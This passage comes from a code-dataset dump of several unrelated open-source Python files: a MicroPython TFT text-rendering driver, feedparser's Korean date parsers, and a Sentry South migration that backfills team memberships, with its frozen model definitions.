if font is not None:
self.text_font = font
self.text_rows = font.height()
self.text_cols = font.max_width()
if transparency is not None:
self.transparency = transparency
if gap is not None:
self.text_gap = gap
if bgcolor is not None:
self.text_bgcolor = bgcolor
if fgcolor is not None:
self.text_fgcolor = fgcolor
self.text_color = (bytearray(self.text_bgcolor)
+ bytearray(self.text_fgcolor)
+ bytearray([self.transparency]))
#
# Get Text Style: return (color, bgcolor, font, transpareny, gap)
#
def getTextStyle(self):
return (self.text_color[3:6], self.text_color[0:3],
self.transparency, self.text_font, self.text_gap)
#
# Check, if a new line is to be opened
# if yes, advance, including scrolling, and clear line, if flags is set
# Obsolete?
#
def printNewline(self, clear = False):
if (self.text_yabs + self.text_rows) >= (self.scroll_tfa + self.scroll_vsa): # does the line fit?
self.scroll(self.text_rows) # no. scroll
else: # Yes, just advance pointers
self.text_yabs += self.text_rows
self.setTextPos(self.text_x, self.text_yabs)
if clear:
self.printClrLine(2) # clear actual line
#
# Carriage Return
#
def printCR(self): # clear to end of line
self.text_x = 0
#
# clear line modes
#
def printClrLine(self, mode = 0): # clear to end of line/bol/line
if mode == 0:
self.setXY(self.text_x, self.text_y,
self.text_width - 1, self.text_y + self.text_rows - 1) # set display window
TFT_io.fillSCR_AS(self.text_color, (self.text_width - self.text_x + 1) * self.text_rows)
elif mode == 1 and self.text_x > 0:
self.setXY(0, self.text_y,
self.text_x - 1, self.text_y + self.text_rows - 1) # set display window
TFT_io.fillSCR_AS(self.text_color, (self.text_x - 1) * self.text_rows)
elif mode == 2:
self.setXY(0, self.text_y,
self.text_width - 1, self.text_y + self.text_rows - 1) # set display window
TFT_io.fillSCR_AS(self.text_color, self.text_width * self.text_rows)
#
# clear sreen modes
#
def printClrSCR(self): # clear Area set by setScrollArea
self.setXY(0, self.scroll_tfa,
self.text_width - 1, self.scroll_tfa + self.scroll_vsa) # set display window
TFT_io.fillSCR_AS(self.text_color, self.text_width * self.scroll_vsa)
self.setScrollStart(self.scroll_tfa)
self.setTextPos(0, self.scroll_tfa)
#
# Print string s, returning the length of the printed string in pixels
#
def printString(self, s, bg_buf=None):
len = 0
for c in s:
cols = self.printChar(c, bg_buf)
if cols == 0: # could not print (any more)
break
len += cols
return len
#
# Print string c using the given char bitmap at location x, y, returning the width of the printed char in pixels
#
def printChar(self, c, bg_buf=None):
# get the charactes pixel bitmap and dimensions
if self.text_font:
fmv, rows, cols = self.text_font.get_ch(c)
else:
raise AttributeError('No font selected')
cbytes, cbits = divmod(cols, 8) # Not in packed format
dcols = (cbytes + 1) * 8 if cbits else cbytes * 8 # cols for display
pix_count = dcols * rows # number of bits in the char
# test char fit
if self.text_x + cols > self.text_width: # does the char fit on the screen?
if self.text_scroll:
self.printCR() # No, then CR
self.printNewline(True) # NL: advance to the next line
else:
return 0
# Retrieve Background data if transparency is required
if self.transparency: # in case of transpareny, the frame buffer content is needed
if bg_buf is None: # buffer allocation needed?
if len(self.bg_buf) < pix_count * 3:
del(self.bg_buf)
gc.collect()
self.bg_buf = bytearray(pix_count * 3) # Make it bigger
bg_buf = self.bg_buf
self.setXY(self.text_x, self.text_y, self.text_x + dcols - 1, self.text_y + rows - 1) # set area
TFT_io.tft_read_cmd_data_AS(0x2e, bg_buf, pix_count * 3) # read background data
else:
bg_buf = 0 # dummy assignment, since None is not accepted
# Set XY range & print char
self.setXY(self.text_x, self.text_y, self.text_x + dcols - 1, self.text_y + rows - 1) # set area
TFT_io.displaySCR_charbitmap(addressof(fmv), pix_count, self.text_color, bg_buf) # display char!
#advance pointer
self.text_x += (cols + self.text_gap)
return cols + self.text_gap
| mit |
ArthurGarnier/SickRage | lib/feedparser/datetimes/korean.py | 43 | 1888 | from __future__ import absolute_import, unicode_literals
import re
from .w3dtf import _parse_date_w3dtf
# 8-bit date handling routines written by ytrewq1.
_korean_year = '\ub144' # b3e2 in euc-kr
_korean_month = '\uc6d4' # bff9 in euc-kr
_korean_day = '\uc77c' # c0cf in euc-kr
_korean_am = '\uc624\uc804' # bfc0 c0fc in euc-kr
_korean_pm = '\uc624\ud6c4' # bfc0 c8c4 in euc-kr
_korean_onblog_date_re = \
re.compile('(\d{4})%s\s+(\d{2})%s\s+(\d{2})%s\s+(\d{2}):(\d{2}):(\d{2})' % \
(_korean_year, _korean_month, _korean_day))
_korean_nate_date_re = \
re.compile('(\d{4})-(\d{2})-(\d{2})\s+(%s|%s)\s+(\d{,2}):(\d{,2}):(\d{,2})' % \
(_korean_am, _korean_pm))
def _parse_date_onblog(dateString):
'''Parse a string according to the OnBlog 8-bit date format'''
m = _korean_onblog_date_re.match(dateString)
if not m:
return
w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s:%(second)s%(zonediff)s' % \
{'year': m.group(1), 'month': m.group(2), 'day': m.group(3),\
'hour': m.group(4), 'minute': m.group(5), 'second': m.group(6),\
'zonediff': '+09:00'}
return _parse_date_w3dtf(w3dtfdate)
def _parse_date_nate(dateString):
'''Parse a string according to the Nate 8-bit date format'''
m = _korean_nate_date_re.match(dateString)
if not m:
return
hour = int(m.group(5))
ampm = m.group(4)
if (ampm == _korean_pm):
hour += 12
hour = str(hour)
if len(hour) == 1:
hour = '0' + hour
w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s:%(second)s%(zonediff)s' % \
{'year': m.group(1), 'month': m.group(2), 'day': m.group(3),\
'hour': hour, 'minute': m.group(6), 'second': m.group(7),\
'zonediff': '+09:00'}
return _parse_date_w3dtf(w3dtfdate)
| gpl-3.0 |
JamesMura/sentry | src/sentry/south_migrations/0204_backfill_team_membership.py | 11 | 39130 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import IntegrityError, models, transaction
class Migration(DataMigration):
def forwards(self, orm):
Organization = orm['sentry.Organization']
OrganizationMember = orm['sentry.OrganizationMember']
OrganizationMemberTeam = orm['sentry.OrganizationMemberTeam']
Team = orm['sentry.Team']
for org in Organization.objects.all():
members = OrganizationMember.objects.filter(
organization=org,
has_global_access=True,
)
teams = Team.objects.filter(organization=org)
for member in members:
for team in teams:
# XXX(dcramer): South doesnt like us using transactions here
try:
sid = transaction.savepoint()
OrganizationMemberTeam.objects.create(
team=team,
organizationmember=member,
is_active=True,
)
except IntegrityError:
transaction.savepoint_rollback(sid)
else:
transaction.savepoint_commit(sid)
transaction.commit()
def backwards(self, orm):
pass
models = {
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.apikey': {
'Meta': {'object_name': 'ApiKey'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Organization']"}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'object_name': 'AuditLogEntry'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_actors'", 'null': 'True', 'to': "orm['sentry.User']"}),
'actor_key': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiKey']", 'null': 'True', 'blank': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'config': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'object_name': 'Broadcast'},
'badge': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group', 'datetime'),)"},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.eventuser': {
'Meta': {'unique_together': "(('project', 'ident'), ('project', 'hash'))", 'object_name': 'EventUser', 'index_together': "(('project', 'email'), ('project', 'username'), ('project', 'ip_address'))"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'sentry.file': {
'Meta': {'object_name': 'File'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'headers': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'storage': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'storage_options': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.group': {
'Meta': {'object_name': 'Group', 'db_table': "'sentry_groupedmessage'", 'index_together': "(('project', 'first_release'),)"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupemailthread': {
'Meta': {'unique_together': "(('email', 'group'), ('email', 'msgid'))", 'object_name': 'GroupEmailThread'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'groupemail_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'msgid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'groupemail_set'", 'to': "orm['sentry.Project']"})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'null': 'True', 'to': "orm['sentry.Project']"}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.helppage': {
'Meta': {'object_name': 'HelpPage'},
'content': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True'}),
'priority': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'object_name': 'Organization'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '2'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationaccessrequest': {
'Meta': {'unique_together': "(('team', 'member'),)", 'object_name': 'OrganizationAccessRequest'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'member': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember'},
'counter': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Organization']"}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMemberTeam']", 'blank': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.organizationmemberteam': {
'Meta': {'unique_together': "(('team', 'organizationmember'),)", 'object_name': 'OrganizationMemberTeam', 'db_table': "'sentry_organizationmember_teams'"},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organizationmember': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'), ('organization', 'slug'))", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'first_event': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
